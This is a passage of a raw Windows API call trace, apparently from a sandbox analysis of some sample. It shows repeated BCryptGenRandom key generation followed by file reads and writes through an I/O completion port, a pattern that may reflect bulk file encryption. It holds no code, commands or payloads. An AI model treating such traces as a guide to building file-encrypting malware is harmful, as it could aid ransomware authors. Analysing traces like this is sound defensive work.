(_Block=0x77d7a8) [0124.247] free (_Block=0x1fa90b8) [0124.247] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0124.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.249] CloseHandle (hObject=0x13c0) returned 1 [0124.254] free (_Block=0x1ff1e60) [0124.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.255] CloseHandle (hObject=0x3bc) returned 1 [0124.256] free (_Block=0x3e70008) [0124.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.263] CloseHandle (hObject=0x308) returned 1 [0124.263] free (_Block=0x3df0008) [0124.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0124.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0124.272] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.272] free (_Block=0x3e305b8) [0124.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.272] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.272] free (_Block=0x1fa91d0) [0124.272] free (_Block=0x77d7a8) [0124.272] free (_Block=0x1fa90b8) [0124.272] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0124.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0124.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0124.277] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.277] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.277] free (_Block=0x3e305b8) [0124.277] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.277] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.277] free (_Block=0x1fa91d0) [0124.278] free (_Block=0x77d7a8) [0124.278] free (_Block=0x1fa90b8) [0124.278] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0124.278] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.343] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.367] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x43c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.382] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.383] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.383] free (_Block=0x3e305b8) [0138.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.383] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.383] free (_Block=0x1fa91d0) [0138.383] free (_Block=0x77d7a8) [0138.383] free (_Block=0x1fa90b8) [0138.383] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.387] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.397] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xafa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.412] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.421] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.421] free (_Block=0x3e305b8) [0138.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.421] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.422] free (_Block=0x1fa91d0) [0138.422] free (_Block=0x77d7a8) [0138.422] free (_Block=0x1fa90b8) [0138.422] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.427] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.436] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.436] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.436] free (_Block=0x3e305b8) [0138.436] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.436] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.437] free (_Block=0x1fa91d0) [0138.437] free (_Block=0x77d7a8) [0138.437] free (_Block=0x1fa90b8) [0138.437] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.454] CloseHandle (hObject=0x308) returned 1 [0138.454] free (_Block=0x3df0008) [0138.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.457] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xd74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.458] CloseHandle (hObject=0xec) returned 1 [0138.458] free (_Block=0x1ff1e60) [0138.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.480] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4314, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.482] CloseHandle (hObject=0x338) returned 1 [0138.482] free (_Block=0x3e70008) [0138.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.501] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.501] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.501] free (_Block=0x3e305b8) [0138.501] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.501] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.501] free (_Block=0x1fa91d0) [0138.501] free (_Block=0x77d7a8) [0138.501] free (_Block=0x1fa90b8) [0138.501] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.513] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.513] free (_Block=0x3e305b8) [0138.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.513] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.514] free (_Block=0x1fa91d0) [0138.514] free (_Block=0x77d7a8) [0138.514] free (_Block=0x1fa90b8) [0138.514] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.535] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.535] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.535] free (_Block=0x3e305b8) [0138.535] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.535] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.536] free (_Block=0x1fa91d0) [0138.536] free (_Block=0x77d7a8) [0138.536] free (_Block=0x1fa90b8) [0138.536] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.541] CloseHandle (hObject=0x338) returned 1 [0138.542] free (_Block=0x3df0008) [0138.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.553] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.553] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.553] free (_Block=0x3e305b8) [0138.553] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.553] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.554] free (_Block=0x1fa91d0) [0138.554] free (_Block=0x77d7a8) [0138.554] free (_Block=0x1fa90b8) [0138.554] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.567] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.567] free (_Block=0x3e305b8) [0138.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.568] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.568] free (_Block=0x1fa91d0) [0138.568] free (_Block=0x77d7a8) [0138.568] free (_Block=0x1fa90b8) [0138.568] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0138.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0138.580] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.580] free (_Block=0x3e305b8) [0138.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.580] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.581] free (_Block=0x1fa91d0) [0138.581] free (_Block=0x77d7a8) [0138.581] free (_Block=0x1fa90b8) [0138.581] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0138.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 